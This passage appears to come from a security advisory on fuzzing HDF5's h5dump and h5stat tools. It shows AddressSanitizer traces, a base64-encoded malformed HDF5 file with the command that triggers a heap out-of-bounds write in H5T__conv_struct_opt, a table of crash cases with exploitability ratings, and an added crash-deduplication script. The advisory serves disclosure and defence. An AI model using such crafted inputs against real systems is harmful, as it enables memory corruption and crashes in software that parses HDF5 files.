    #24 0x7f4b6151961a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #25 0x5568d72adbe4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #26 0x5568d72a61c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #27 0x7f4b60e30d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #28 0x5568d72a8649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x602000005b40 is located 0 bytes to the right of 16-byte region [0x602000005b30,0x602000005b40)
allocated by thread T0 here:
    #0 0x7f4b61c87e8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7f4b615acf5a in H5O__fill_copy /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Ofill.c:568
    #2 0x7f4b615d4882 in H5O_msg_copy /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Omessage.c:722
    #3 0x7f4b615f98e5 in H5P__dcrt_fill_value_copy /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Pdcpl.c:1274
    #4 0x7f4b61658c16 in H5P_copy_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Pint.c:1004
    #5 0x7f4b6130d00f in H5D_get_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dint.c:3569
    #6 0x7f4b618ca8a4 in H5VL__native_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:466
    #7 0x7f4b6189bcfa in H5VL__dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2426
    #8 0x7f4b6189bcfa in H5VL_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2457
    #9 0x7f4b6128f1e6 in H5Dget_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:776
    #10 0x5568d72ae733  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29733)
    #11 0x5568d72b7947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #12 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #13 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #14 0x7f4b61484212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #15 0x7f4b611fe721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #16 0x7f4b6120205e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #17 0x7f4b61492c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #18 0x7f4b6148b3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #19 0x7f4b61475d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #20 0x7f4b6152dc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #21 0x7f4b618d5455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #22 0x7f4b618ac095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #23 0x7f4b618ac095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #24 0x7f4b6151961a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #25 0x7f4b6151961a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #26 0x5568d72adbe4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #27 0x5568d72a61c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #28 0x7f4b60e30d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
Shadow bytes around the buggy address:
  0x0c047fff8b10: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff8b20: fa fa fd fa fa fa 00 03 fa fa 00 04 fa fa fd fd
  0x0c047fff8b30: fa fa fd fd fa fa fd fa fa fa 00 fa fa fa fd fa
  0x0c047fff8b40: fa fa 00 fa fa fa fd fa fa fa 00 fa fa fa fd fa
  0x0c047fff8b50: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 04 fa
=>0x0c047fff8b60: fa fa 04 fa fa fa 00 00[fa]fa fa fa fa fa fa fa
  0x0c047fff8b70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8b80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1090==ABORTING

H5T__conv_struct_opt Heap Buffer Overflow

Details

The following write-based heap overflow was found by fuzzing the h5dump helper utility. An attacker who can control an h5 file, or other HDF5 data parsed by a target system, can trigger an out-of-bounds write in the H5T__conv_struct_opt method.

PoC

The following PoC shows the AddressSanitizer output detailing the location of the heap overflow.

$ echo "H4sICAIuv2QAA2U5MmQ2YTY2Y2NlYjgyNGUzZmJmOTY5MGRlNGRmZDVkAOv0cHHj5ZLiYgABDg4GFgYBBmYGBPgPBRIcqHyY/A4mBhzgLViVh6tjAIhnABVVgNINbNh1wUwOCXJ1ZWBghNuHbq8FK4TmwDDgOTZTP2O3rQNE/MLlAxygnkT1eMEC0oxnR+XeQ+awkmbzf5L88Z+wEgoAE4MDbpv//3+CKcoI1MPIAk9PAoLAdMsIZMyAyidgqGcDyXOAFYE0ACEIbICmwwxGmDoBKP3//1Mg/Q+qnw8kDrTMyAAITA0tDU1NTEwNQQZKgI1kZAKRD/7/gGYeUIaCuG0CpuPfQBIyE9z1OD2PFzzFFPrfiSn0vx4WeQ2SDPJYTfpg79hgDKRPHAJip4BGZmgwNdhD5B/YO81GyBtMN2aAZPsGh1AwuGrvDOZD5EFykGAQcITov2DvgiQPCnIWiH6jWTNB4KS9K0T+4AuofkhiPuEIMf+ovRuSfhALEm0CTpNUPIHokL07TD7lhBPIbkhGcQGzGW4csPdAsx9SbjQ4yRwvBKI99p5o7ucE8xc5gd1XvdPeC0leE1j8BPv5uzACQwlW/rxALgdJLVFwASmQE8nS+QdEvMMUl6XANUjgJ8k6+AnIOxYVJVb6dwaXFJU2MJQWpRZDxaHZEp5FmBkSGEFiYsAEZAukE+PzEnNTCdkOzO3asDSnwJAE1cNCQJeggvxvZqgecQ4G8XwgKxmqF6PewdBrD1XjwGDCzWCKZADEN8gGoGZKRjEmcKlXn5yRWITsvaf/sZXCiXCWMBDLCcsxJILCEqgRHnhoAJxUYYVCCtA18vIMPEj+BFVwAKDQPF0YCAAA" | base64 -d | gunzip -c > e92d6a66cceb824e3fbf9690de4dfd5d
$ ./hdf5/bin/h5dump ./e92d6a66cceb824e3fbf9690de4dfd5d
HDF5 "./e92d6a66cceb824e3fbf9690de4dfd5d" {
GROUP "/" {
   DATASET "ArrayO�Stru�" {
      DATATYPE  H5T_COMPOUND {
         32-bit big-endian integer 32-bit precision "a_name";
         24-bit little-endian floating-point 32-bit precision "b_name";
         64-bit little-endian floating-point 64-bit precision "c_name";
         H5T_COMPOUND {
            H5T_STRING {
               STRSIZE 1970974;
               STRPAD H5T_STR_NULLTERM;
               CSET H5T_CSET_ASCII;
               CTYPE H5T_C_S1;
            } "char_name";
            96-bit big-endian integer 32-bit precision "array_na";
         } "o";
      }
      DATASPACE  SCALAR
=================================================================
==968==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1d2521ab40 at pc 0x7f1d299fc469 bp 0x7ffd71677900 sp 0x7ffd716770b0
WRITE of size 1970980 at 0x7f1d2521ab40 thread T0
    #0 0x7f1d299fc468 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
    #1 0x7f1d29557f58 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2642
    #2 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7f1d29558171 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
    #4 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7f1d29105b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7f1d290c3221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7f1d290f95d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7f1d296aeee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7f1d2967eafc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7f1d2967eafc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7f1d2906da0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7f1d29075444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x556692a2546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x556692a3a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x5566929f3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x5566929fc947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7f1d29269212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7f1d28fe3721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7f1d28fe705e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7f1d29277c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7f1d292703d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7f1d2925ad71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7f1d29312c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7f1d296ba455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7f1d29691095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7f1d29691095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7f1d292fe61a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7f1d292fe61a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x5566929f2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x5566929eb1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7f1d28c15d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #34 0x5566929ed649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x7f1d2521ab40 is located 0 bytes to the right of 1971008-byte region [0x7f1d25039800,0x7f1d2521ab40)
allocated by thread T0 here:
    #0 0x7f1d29a6ce8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7f1d292162ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
    #2 0x7f1d292174f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
    #3 0x7f1d290f6fa3 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1447
    #4 0x7f1d290f941b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
    #5 0x7f1d290f941b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
    #6 0x7f1d296aeee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7f1d2967eafc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7f1d2967eafc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7f1d2906da0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7f1d29075444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x556692a2546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x556692a3a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x5566929f3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x5566929fc947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7f1d29269212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7f1d28fe3721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7f1d28fe705e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7f1d29277c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7f1d292703d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7f1d2925ad71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7f1d29312c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7f1d296ba455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7f1d29691095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7f1d29691095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7f1d292fe61a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7f1d292fe61a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x5566929f2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x5566929eb1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7f1d28c15d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
  0x0fe424a3b510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe424a3b560: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x0fe424a3b570: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b5a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b5b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==968==ABORTING

H5Stat Fuzzing

The following crashes were discovered by fuzzing the h5stat utility with AFL++.

Filename | Summary | ASAN Summary
30b688e7cbe565ec986c71489d772f84 | READ of size 1 in H5F_get_checksums | SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Fio.c:556 in H5F_get_checksums
317b9d862750b238f6eeacb04171e075 | Invalid READ memory access on unknown address 0x000000000008 | SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:7495 in H5VL_blob_specific
36733df20ddc97273a6363f88815e7a7 | Stack overflow caused by an infinite loop and stack exhaustion | SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Oshared.c:304 in H5O__shared_decode
367649861c56b0b2ee497bb8ef42ae0e | READ of size 18 in H5T__conv_ref /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3780 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy
39a0e73f7d0f7e396ccb09e826083bc2 | Floating point error | SUMMARY: AddressSanitizer: FPE /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Dchunk.c:695 in H5D__chunk_set_info_real
4512b0fa12719efa790f5aac035f3e71 | WRITE of size 64 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
57846c4fd17ff9378f0a44eaef3d5a11 | negative-size-param: (size=-1) in H5O__link_decode /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Olink.c:209 | SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy
76a27427f63a1ca8e7b9acade505c983 | Stack overflow caused by an infinite loop and stack exhaustion in H5B__get_info_helper /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5B.c:1918 | SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5C.c:2031 in H5C_protect
8ebfabca399c9882144390c2824a9956 | Stack overflow caused by an infinite loop and stack exhaustion in H5G__visit_cb /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Gint.c:1100 | SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/asan/asan_stack.cpp:57 in __sanitizer::BufferedStackTrace::UnwindImpl(unsigned long, unsigned long, void*, bool, unsigned int)
a8bf502b9051d547760292a54908d0de | READ of size 272 in H5D__btree_idx_iterate_cb /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Dbtree.c:1047 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy
b3358eb6912b440e85afbf1eaf8aab37 | Stack overflow caused by an infinite loop and stack exhaustion in H5O__dtype_shared_decode /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Oshared.h:60 | SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Omessage.c:488 in H5O_msg_read_oh
cc5fc6037ddcd3d5597e49a12e3ddf9d | Floating point error | SUMMARY: AddressSanitizer: FPE /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5T.c:3602 in H5T__complete_copy
e008d3608912f88ae83aebe70689dcdf | READ of size 8 located 24 bytes to the right of global variable 'FS_STRATEGY_NAME' defined in 'h5stat.c:38:13' | SUMMARY: AddressSanitizer: global-buffer-overflow (/home/doi/src/triage/hdf5-1.14.1-2-ASAN/hdf5/bin/h5stat+0x1df8e)
f93c69013478b5b9eab33f7412e947d1 | Stack overflow caused by an infinite loop and stack exhaustion in H5E__push_stack /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Eint.c:765 | SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/asan/asan_thread.cpp:410 in __asan::GetCurrentThread()
ffb3610ce23ccaed3c1d45ce5c17f47b | Stack overflow caused by an infinite loop and stack exhaustion | SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Oshared.c:304 in H5O__shared_decode
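The table above lists one row per crashing test case, while the advisory counts unique issues by stack hash, since a fuzzer routinely produces many inputs for the same root cause. The following Python script is an added example of that de-duplication step and is not Pulse Security's tooling: it parses AddressSanitizer reports of the shape reproduced in this advisory (ERROR line, READ/WRITE line, symbolised and unsymbolised frames, the later "freed by" / "allocated by" stacks), and buckets test cases by a "major" hash built from the bug class and the top application frames, with sanitizer interceptor frames skipped. The sample reports embedded in the script are constructed; their PIDs, addresses and paths are made up, and only the function names are taken from this advisory.

```python
"""Triage helper for AddressSanitizer (ASan) crash reports.

Added example, not Pulse Security's tooling: parses ASan output as printed by
h5dump/h5stat, extracts bug class, faulting access and crashing stack, and
derives a "major" stack hash so fuzzer findings can be de-duplicated."""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass

# "==1090==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020..."
ERROR_RE = re.compile(r"==\d+==ERROR: AddressSanitizer: ([\w-]+)")
# "WRITE of size 64 at 0x602000005b40 thread T0"
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+)")
# Symbolised frame: "#1 0x7f4b61881782 in H5T__ref_mem_setnull /src/H5Tref.c:394"
SYM_FRAME_RE = re.compile(r"^#\d+ 0x[0-9a-f]+ in (\S+)")
# Unsymbolised frame: "#9 0x5568d72ae733  (/path/to/h5dump+0x29733)"
RAW_FRAME_RE = re.compile(r"^#\d+ 0x[0-9a-f]+\s+\((\S+)\)$")
# Frames that belong to the sanitizer runtime rather than the code under test.
SANITIZER_PREFIXES = ("__interceptor_", "__asan", "__sanitizer")


@dataclass
class AsanReport:
    bug_class: str      # e.g. "heap-buffer-overflow", "SEGV", "stack-overflow"
    access: str | None  # "READ"/"WRITE", or None when ASan prints no access line
    size: int | None    # bytes accessed, or None
    frames: list[str]   # crashing stack, innermost frame first


def parse_asan_report(text: str) -> AsanReport:
    """Extract the first (crashing) stack. The "freed by" / "previously allocated
    by" stacks that follow describe the object's history, not the bad access."""
    bug_class = access = size = None
    frames: list[str] = []
    in_stack = False
    for raw in text.splitlines():
        line = raw.strip()
        if bug_class is None:
            m = ERROR_RE.search(line)
            if m:
                bug_class, in_stack = m.group(1), True
            continue
        if not in_stack:
            break                        # crashing stack already collected
        m = ACCESS_RE.match(line)
        if m:
            access, size = m.group(1), int(m.group(2))
            continue
        m = SYM_FRAME_RE.match(line)
        if m:
            frames.append(m.group(1))
            continue
        m = RAW_FRAME_RE.match(line)
        if m:
            # Keep "binary+offset" only: the load address differs between runs.
            frames.append(m.group(1).rsplit("/", 1)[-1])
            continue
        if line == "" and frames:
            in_stack = False             # a blank line terminates the stack
    if bug_class is None:
        raise ValueError("no AddressSanitizer ERROR line in report")
    return AsanReport(bug_class, access, size, frames)


def major_hash(report: AsanReport, depth: int = 5) -> str:
    """Hash the bug class plus the top `depth` non-sanitizer frames, so that test
    cases crashing through the same path collapse into one bucket."""
    app_frames = [f for f in report.frames if not f.startswith(SANITIZER_PREFIXES)]
    key = "|".join([report.bug_class, *app_frames[:depth]])
    return hashlib.sha256(key.encode()).hexdigest()[:16]


def group_crashes(reports: dict[str, str], depth: int = 5) -> dict[str, list[str]]:
    """Map each major hash to the test-case names whose reports produced it."""
    buckets: dict[str, list[str]] = {}
    for name, text in reports.items():
        buckets.setdefault(major_hash(parse_asan_report(text), depth), []).append(name)
    return buckets


# Constructed sample reports modelled on the traces in this advisory; PIDs,
# addresses and paths are made up, function names are ones the advisory lists.
CRASH_A = """\
==1090==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000005b40 at pc 0x7f4b61c17269
WRITE of size 64 at 0x602000005b40 thread T0
    #0 0x7f4b61c17268 in __interceptor_memset sanitizer_common_interceptors.inc:778
    #1 0x7f4b61881782 in H5T__ref_mem_setnull /src/H5Tref.c:394
    #2 0x7f4b6177984f in H5T__conv_ref /src/H5Tconv.c:3758
    #3 0x7f4b6173e87a in H5T_convert /src/H5T.c:5449
    #4 0x5568d72ae733  (/build/hdf5/bin/h5dump+0x29733)

0x602000005b40 is located 0 bytes to the right of 16-byte region
allocated by thread T0 here:
    #0 0x7f4b61c87e8f in __interceptor_malloc asan_malloc_linux.cpp:145
"""
# Same crash from a second test case: only the PID and load addresses differ.
CRASH_B = CRASH_A.replace("==1090==", "==1091==").replace("0x7f4b", "0x7f00")
CRASH_C = """\
==1203==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f00dead0000 T0)
==1203==The signal is caused by a READ memory access.
    #0 0x7f00dead0000 in H5VL_blob_specific /src/H5VLcallback.c:7495
    #1 0x7f00dead0100 in H5T__conv_ref /src/H5Tconv.c:3780
    #2 0x7f00dead0200 in H5T_convert /src/H5T.c:5449
"""
```

Running group_crashes over the three constructed reports yields two buckets: CRASH_A and CRASH_B share a hash because their stacks agree once addresses and PIDs are ignored, while the SEGV in H5VL_blob_specific lands in its own bucket. The depth parameter is the usual trade-off in crash triage: a shallow hash merges distinct bugs that share a hot leaf function such as H5T_convert, a deep one splits one bug across callers.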

Further research regarding the practical exploitability of these issues was not performed. The following table details the output of the GDB Exploitable plugin, which has been included as an additional data point and is not intended to be used as commentary around real-world exploitability.

Filename Exploitability Explanation
367649861c56b0b2ee497bb8ef42ae0e UNKNOWN The target crashed due to an access violation but there is not enough additional information available to determine exploitability.
39a0e73f7d0f7e396ccb09e826083bc2 PROBABLY_NOT_EXPLOITABLE The target crashed on a floating point exception. This may indicate a division by zero or a number of other floating point errors. It is generally difficult to leverage these types of errors to gain control of the processor.
4512b0fa12719efa790f5aac035f3e71 PROBABLY_NOT_EXPLOITABLE The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor.
57846c4fd17ff9378f0a44eaef3d5a11 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
